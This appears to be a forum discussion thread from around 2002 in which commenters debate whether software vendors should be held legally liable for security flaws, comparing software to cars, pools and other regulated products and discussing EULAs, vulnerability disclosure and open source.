Well, to get a realistic comparison, you'd need to compare on even ground. Pretend for a moment that your car door locks went to "locked" when you pushed the lock button, and "unlocked" when you pushed the unlock. However, they didn't actually engage the tumblers in the door, so when it's locked, the handle still opens the door. Now, there's a switch inside the door that you can get to by pulling the door side off, and when you throw it the tumblers connect and when the door says "locked" it now really means it.
Now, would you blame Honda if they didn't set the switch to "on" at the factory, and didn't tell anyone about the switch, and only acknowledged that it exists when someone in the field finds it and threatens to tell the general public?
I'd bet you would. That's a fairer comparison, and so yes, I think the companies that produce easily exploitable software should be forced to reckoning for it.
Virg
Second, if any laws are written, my guess is they would merely extend already existing more generic laws regarding false advertisement. Under such circumstances, software vendors would not be *required by law* to produce secure software. But, if their advertising campaign, sales representatives, software packages blatantly lead potential consumers to believe that their product is of "enterprise-level", "mission-critical-caliber", "secure", "reliable" or any such wording which implies "secure software", then the law could provide for some serious compensations to the harmed consumer.
To avoid endless legal battles over wording, the government should define an entity whose role would be to design, draft and maintain a *very specific* scale of security levels which defines strong standards for security features within software packages. The scale could not only provide very precise security requirements for software, but also standards type of compensation to the consumer for failure to meet each of its levels' standards.
Such scale should be massively advertised thru all media so consumers would know to look for a software package's rating on such scale before purchasing it for any mission-critical purpose.
We could let software vendors rate their own software packages according to this scale. If the scale is *specific-enough* and clearly defines levels of security, then consumers should have very strong cases to bring to class-action law-suits to seek compensation in the case such software should fail to meet all of the requirements defined by their advertised grade on the scale.
Such model would keep the government's involvment minimal and place all of the liabilities on the software vendor, so consumers don't ever have to seek compensation from some government-sanctioned entity which would assign ratings to software packages. We must keep in mind that computer software is by nature a highly volatile, constantly evolving, and rarely flawless type of product, as every new piece of software written is by nature "cutting-edge".
Extraordinary Vacations. Exceptional Prices
What's obvious malpractice to you and me, might not be so obvious to others.
DMCA, Hollings, Palladium. What might have sounded like paranoia is now common sense.
no laws can be made to punish the software companies for faulty security or stability.
in EVERY Eula I have ever seen and read there is the following clause...
XYZ co is not liable for any use or misuse of this product, in fact the product is not warrented in any way or even for sutiability for any purpose.
All EULA's have the standard disclamer that this might work, and it might kill 1/2 the planet's population...
Do not look at laser with remaining good eye.
NIMBA a NIMBA stupid NIMBA coding NIMBA bug NIMBA NIMBA left NIMBA many NIMBA NIMBA NIMBA systems NIMBA NIMBA open NIMBA NIMBA NIMBA NIMBA NIMBA
I wonder what this acronym is supposed to stand for. At first, I thought it meant "Not In My Backyard", but that's usually spelled NIMBY.
Not In My Butt AGAIN ?
I think this is a great idea, and should be extended into other areas. Penalize people who get sick. They should have taken better care of themselves and are costing the rest of us money. And people who have their houses knocked down by an earthquake or flattened by a storm should be fined as well for not taking the proper precautions.
It took legislation to make cars safe. The auto companies hated it. They fought every inch of the way. But it made the auto industry grow up and make their products really work, no matter what.
Every major industry goes through this transition, where society insists that the technology work safely. Railroads did. Steam boilers did. Autos did. Civil engineering did. Electric power did. It's time for computing to do it.
It's time for the software industry to grow up and stop hiding behind one-sided licensing agreements. Software is too important in modern life to be as crappy as it is.
> In any case you could equally say that Microsoft provides you the binary so why don't you just hexedit the security faults out.
We can't do that, because modifying or reverse-engineering the code is forbidden by the EULA.
So there.
Virg
Though the article mentions Microsoft because of their security record, I think that the drafters of the proposal are "thinking of" consumers, not the fortunes of any one company/group of developers. And, I believe it is the ethical duty of software developers, whether Open Source or proprietary, to think of the users of our software as well. Which is why, as I've said, if drafted correctly I'm not neccessarily opposed to such a law.
With regard to the specific example of IE, well, if IE has a security flaw that exemplifies gross negligence, then the fact that it's free won't mitigate against liability. If the flaw is in an OS component (as much of the functionality previously offered in IE is now embodied), then it wasn't free, was it?
WRT to the "seldom used" product, well if the company charged money for it, and if it had a security hole which caused actual damages to one of their customers, why shouldn't they be liable?
What I find far more scary is that if this were to be passed, software vendors would stop telling people that their software was buggy, in the hopes of hiding it. This was exactly the same tactic Microsoft took when releasing the XP patch- they didn't instantly recall their product, they sat on the bug for two weeks while the rest of the world floundered. Microsoft did this just for marketing- imagine if someone was also planning on pressing charges! More extensive laws will obviously just intensify this problem.
Another curiousity- consider for profit companies, hired by either the government or opposing vendors, whose soul purpose is to exploit software in as many ways as they can, to make sure the American people are "safe".
Sure why not? A piece of software should have a meaningful warranty and should comply with its own warranty. If software causes irreperable damage to something we're way beyond, in the year 2002, the days where "Hey if anything at all happens, if the software even works at all it's not our problem.
If software has a problem which causes me to lose money or to lose my identity or some other problem there is utterly no reason why the software maker can't or shouldn't be held responsible for fundamental flaws. We're not talking about usage or configuration or intended use but about basic patchable problems associated with forseeable risks. No product liability is intended to hold the manufacturer liable for anything, but instead for reasonable use. You can't reasonably sue a hairdryer maker if you drop it in the bathtub but if in normal use it bursts into flames and burns you - yeah you sure can. Same with software. If you're using it correctly and some fundamental problem that could have been uncovered if they bothered to do some rudimentary checking then they should be held liable as well.
So you base your opinion of politicians based solely on the position that your party tells you to have? I think Nader's a moron too, but it's certainly not because my party says so.
How can we continue to believe in a just universe and freedom to eat crackers if we have no ale?
I'm sure that this is targeted at Microsoft, but there'd be a lot of $$$ made off of the folks that developed/distributed BIND and SendMail. Couldn't it also punish sites like Download.com?
... bits and bytes are insignificant when compared to the needs of the world and future generations, and anyone who thinks otherwise needs to re-examine their humanity) I seriously doubt you'd see any improvement for the consumer - the government is the only one who stands to gain, and that kind of greed puts them on the same level as Microsoft.
I know the argument is, "If it's free, it's not liable". So Microsoft reworks its liscense in such a way that all linked libraries are free (that's an oversimplification) or that you're paying for the right to install, but not the operating system itself. If they were still liable in that instance, then RedHat/Mandrake/Debian/etc would be in deep do-do.
So how do you prove that the software vendor is liable? If you're brakes fail because you never filled your fluid, then the manufacturer is liable. If your operating system fails because you didn't patch it (and a patch was reasonably available), how different would the situation be?
What about modification? If I put aftermarket rims on my car, that will likely void my warranty and some issues of liability (oversimplification, again). So, a software vendor could make claims that "unauthorized" software (probably open to their interpretation) could have "unexpected" interaction, possibly releasing them from liability.
Another thought: safety recalls. Most of the time, there are not fines for "unsafe" products - there are voluntary or government mandated recalls. If you choose not to return the product, that's your fault. So, when there's a new "security flaw", MS recalls Windows, and you have to uninstall it from your computer and return your media for a refund or replacement. How would that fly? (Many "simple" consumers have a hard time differentiating between the computer and the software: they bought a "Dell": further complicating things)
Retrospective? Would this only apply to new shipments, or to all of the copies of Linux, Mac, and Windows already out there? That's be a tough sell.
The bottom line: this is motivated by politics and money. It would do nothing to enhance security and consumer rights. Many large companies will freely dump their waste, knowing that it's cheaper to pay the fine than it is to dispose "the right way". They just consider the fine an operating cost, which usually gets integrated into their pricing structure. So MS raises their prices to accomodate fines. I seriously doubt the fine would be significant. (Go back to the dumping example: if software flaws result in a bigger fine than destroying the environment, we're all in trouble
The best thing about a boolean is even if you are wrong, you are only off by a bit.
I'd say the proper analogy to security problems would be you lock the check in the glovebox of the car and lock the doors, but due to a defect in the design or manufacturing process ( not just a random defective part, but either the design causes this or all parts made are defective ) the locks all spring open if someone hits the passenger-side door hard, letting a thief steal everything in the car. In that case the car maker probably would be held liable for the defects because they should've caught them and, quite simply, the locks aren't performing as locks are expected to perform.
Like I said, we treat software the way we treat cars in this regard. We don't hold car makers liable for the modifications their customers make after they've bought the car, or if their customers abuse the car ( eg. taking a Corvette on a cross-country off-road race ). But we hold them liable for the way they design and make the cars ( eg. designing a car where the fuel tank is placed so it ruptures on any rear-end impact, or manufacturing tires without doing any quality control to make sure they won't explode while driving normally ).
I said this a while back and I'm saying it again:
There should be criminal and civil penalties for withholding information about security risks. Right now I do not have the legal right to know about security risks that are discovered in systems I use, the creators of those systems are not legally required to inform me when a new risk is discovered. This means that I can not make an informed decision about how to protect myself from the problem. I can't even use a list of currently unresolved risks to help me decide what systems to use and/or purchase.
To me, the withholding of security risk information is a form of fraud. It is the same as rolling back the odometer on a used car. It is the same as selling Pintos with exploding gas tanks and the same as selling flammable pajamas to children. Companies must be required to release security risk information about their systems in a timely manner. They must be legally liable for damages that result from security issues between the time they discover the problem and the time they warn users of the problem. These kinds of penalties will force companies to create secure systems in the first place. And, to warn people in a timely manner so that they can take action to protect themselves. Although it is tempting I don't think the developers should be required to fix the system. But, a list of all outstanding security problems must be included in advertising and on the packaging of any system. People have to be able to make an informed decision about what systems to use. We put warning labels on beer and cigarettes, we require people to wear seat belts, we require the disclosure of the ingredients of all our food, we have lemon laws to protect us from unscrupulous car salesmen, and we have product liability laws that cover every physical thing we purchase. But, we have no equivalent legal protection from the purveyors of software snake oil.
The only way a company should be able to get out from under these penalties is to declare the product "dead", notify all customers of record that no more security support will be given for that product. Declaring the software dead should also require that the source code and/or system designs as well as any patent and copyrights to the system be released to the customers so that customers can arrange for other sources of security support for the system. At that point the company would not be allowed to sell, distribute, or accept any sort of payment including royalties and support payments for the software.
Stonewolf
Though, I don't know what a real law would look like...
Consider, say, the hotel I was at years ago... they had an indoor pool. Before you used the pool, you had to sign a waiver... they had a stack of them in the pool room.
The waiver basically said using the pool was at your own risk, etc, etc.
Now... Dad asked his lawyer later, for kicks.
Say you drowned becuase you couldn't swim.. and they had no lifeguard. This document would protect them... it was fairly clear there was no lifeguard.
But.. say the diving board was in disrepair, and broke off while you were about to dive, causing you to fall and break leg... guess what? That contract doesn't absolve them of responsibility. Why? Because... it was reasonable to expect that the diving board worked.. the owner still had a duty to keep the area safe for it's users, regardless of their waiver. (If they wanted a waiver to protect them against that, they would have to clearly state the risks.. state that the facilities are in bad repair and broken.
Now.. software, we have these horrible EULAs... but still. I can understand how it's okay for a company to, say, protect itself from being sued over some little bug.. of COURSE they have to. Like.. say Excel crashes while you are in the middle of some work.. and you have to re-do it, so you are late for a meeting, so you lose the deal, etc.
Just as in the real world, where even a disclaimer can't generally release you of all obligation, so should it be with software. I don't know what the wording would be, or what would be fair... but software vendors should have a certain level of accountability for what they do.
Now.. how does this affect OSS? I don't know. Do I think OSS authors should be responsible for what they do? Yes, to a degree.. but there is a problem.. I don't think someone should be sued just because they shared some code with the world and it didn't work.
This has nothing to do with the discussion.
Look, there are insecure software packages out there. But for each of those insecure software packages there is a more secure alternative. If anyone disagrees with me and has a specific example, please reply.
If organizations have been choosing the insecure packages, they have made their bed to sleep in. Asking a government to step in because they made a choice that turned out to have more risks than they anticipated is disengenuous and naive of that organization.
obviously no deficiencies vs. no obvious deficiencies
It certainly does not claim that Microsoft is responsible for most security issues. If it had I would have expected Butler Lampson to have resigned from the board. It is not usual for NAS reports to target particular companies. It is not likely that David Clark would attack Butler in that way given that they are both LCS computing profs.
The statement about Microsoft is actually introduced from other sources but in such a way that the casual reader assumes it was a recomendation from the report. The only occurrence of the string 'Microsoft' in the text is Butler's accreditation.
Likewise I find it hard to find any recomendations. The majority of the report is simply a post 9-11 rehash of three previous reports by the same board. The nearest the report comes to suggesting legislation is:
Consider legislative responses to the failure of existing incentives to cause the market to respond adequately to the security challenge. Possible options include steps that would increase the exposure of software and system vendors and system operators to liability for system breaches and mandated reporting of security breaches that could threaten critical societal functions
That is quite a way from endorsing legislation, which is hardly surprising given the makeup of the panel.
Looking for an Information Security student project suggestion?
Try http://dotcrimeManifesto.com/
Right, but those are all the problems it should cover. If a car maker does a recall to fix a problem and gives the owner sufficient notice of the problem and the owner doesn't take his car in to get it fixed, the car maker isn't liable for things that happen after the recall was issued. Same with software, if a fix was made and publicized sufficiently well and the user didn't apply it, it's not the software vendor's problem anymore.
With open source, the source code is there for others to fix. That's the whole point of open source. With companies like Microsoft, you get someone sending them an exploit, and them taking 4 months to fix the damn thing because they don't want to hurt christmas sales. I think that a company, especially someone who is charging you for upgrades, and you assuming that it's going to be more secure, be liable to a certain extent. Many companies are pushing for you to upgrade your software, but what are we really getting? I don't need a clipboard buddy, I want something more stable, and more secure.
I have no signature
If they weren't calling in federal marshals for help in conducting audits, it might seem different, but what possible excuse is there for releasing them from any and all responsibility while THEY can have people with guns and warrants busting into your workplace and tearing apart all your computers?
Hold them to the same strict code that they hold others, and give it just as many teeth as they want to use against you. Granted, that would be hard (imagine getting a warrant to rip apart all the Windows development systems at Microsoft to look for evidence that a bug was maliciously ignored!) but it is starkly insane to expect these guys to have police-like powers yet be exempt from all responsibility themselves.
One element which you are forgetting is that the free market depends upon its participants being knowledgeable
This is not necessarily true. Given a large number of unknowledgable participants in a market, to the degree that they cannot tell if they have chosen a poor product even after the fact: some of them will choose poor products, and by luck some will accidentally choose better products.
Those that go out of business will stop buying the poor products, or at least not expand as quickly as the business which made better decisions.
In reality it is somewhat difficult to tell how good your security is until youve been breeched.
It is also true that the market is not really large enough for a fully liquid "Free Market".
The truth is somewhere in the middle, where companies that make it their business to be informed about security will have an advantage over those that do not, hence government intervention will be bad: it will encourage businesses to let an external organization worry about their security.
If the government wants to see some progress made in nation-wide computer security, they ought to not waste money punishing big dumb companies, but instead fund the geeks over at the NSA to work on Open Source security-related projects, much as they did with Linux and ACL's. Otherwise, I fail to see the courts could be objective. Accidents happen. Would companies get a quota of security holes per year?
Everyone would be in violation....
And of course, if Microsoft is too important to the country to be punished under anti-trust law, what're the chances they (or any other large corp with big bottom lines and lots of legal dollars) would be punished under security law?
BUT.... what if security _claims_ were regulated by a much tighter law -- say, much like SEC filings. I have never read a prospectus that was anything but pessimistic about a company's prospectus -- that's because they know that if they put anything that's hype in it, they may as well write a check out for the lawsuit that's coming and perhaps pack for a trip to white-collar jail. OK, unless you're Milliken(?. that one guy pardoned by Clinton who hid in Switzerland for 10 years).
Require an SEC like full disclosure of known vulnerabilities. Assess daily penalties for each week a known vulnerability is kept secret (if you like, only assessed from the day it's found in the wild). Make advertising about security a binding promise. Software companies would be a lot more careful about what they claim and more forthcoming about actual information. And in the presence of more perfect information, the market will serve ALL parties more effectively.
Just my thoughts....
Libertarianism is rich wolves and poor sheep playing gambler's ruin for dinner.
"I don't care what your EULA says. I didn't agree to it. I didn't install the software." -- Me
Of course it won't work, but then neither should their EULA garbage if it ever gets in front of a halfway intelligent judge.
Personally, I think the greens and libertarians should merge. I am a green, yet I'm not a socialist or pro dope. I'm a capitalist and a believer in freedom.
Maybe they should regroup as liberal greens?
I have a Libertarian friend and we are at complete odds on most issues. Techically speaking, I'm a left-leaning authoritarian* and he's a right-leaning Libertarian. Refer to the nolan chart. Greens are actually best matched with the Natural Law party.
Well, keeping this on topic, I find myself agreeing with Libertarians in that I don't think that we should pass such a law... right now. The people in congress are far too corrupt to even consider pushing something like that through them. Only the small companies will be hurt by the monstrosities that they are capable of creating. What we need right now is campaign finance reform, so that in the future we can have decent lawmakers who will pass such a law and make it fair.
* This does not mean I am a Communist. I do not approve of dictatorships.
Remember "Bring 'em on"? *sigh
Ask any pharmaceutical or biotech company what happens when one of their products fails and someone is injured. They'll tell you often times there are criminal as well as civil penalties. If Ford had to make a safe Pinto, why shouldn't software vendors be forced to make secure software?
Many will argue that bad software isn't life threatening, and therefore doesn't require stiff penalites, I say baloney! If the firmware that controls the hydraulic systems on an aircraft fails in flight you probably won't survive. If your database on your e-commerce site gets hacked due to a "buffer overflow" error, and all your credit cards get out on the web, shouldn't someone be held liable for the damages...or are we going to let the insurance industry just mop up the dammage and pay for it with higher premiums.
There has to be some accountablity for negligent behavior.
-ted
>We want to destroy the DMCA that restricts our freedom of speech, and yet we want to RESTRICT companies from doing what they want.
Yes. But they're allowed to SPEAK about what they want. That's not hypocritical, that's the difference between speech and action.
//rdj
No one can understand the truth until he drinks of coffee's frothy goodness.
--Sheikh Abd-Al-Kadir, 1587
I'm not following your logic at all. How did you get from modifying the source of a program vs. hacking the executable to GPL issues? To wit, the original discussion was about modifying a program your company uses. My point was that altering OSS was different from hacking Microsoft because you're not legally allowed to hack the .EXEs, but you're legally allowed to monkey with OSS. The GPL in this case would only apply to redistributed code, not "internal, proprietary software development" (your words). And while RMS and Co. could lay on a lawsuit charging you with pilfering GPL code within a program you sell, they'd have to prove it just like anyone else who wants to sue you, so there's no larger risk of litigation than from any code jockey you ever come in contact with.
> Of course all code isn't GPLd...but that which is represents a similar risk to the EULA.
Not at all. They're different animals, with different situations. As stated above, the GPL applies only to redistributed code. If I get a copy of Red Hat Linux and munge the kernel code to run faster on my local Frankensystem 2002, but I don't redistribute that code outside my business, the GPL never applies. Hacking WINWORD.EXE is always, under every circumstance, illegal, even if I then don't even run the modified executable. Just changing it is a violation.
Virg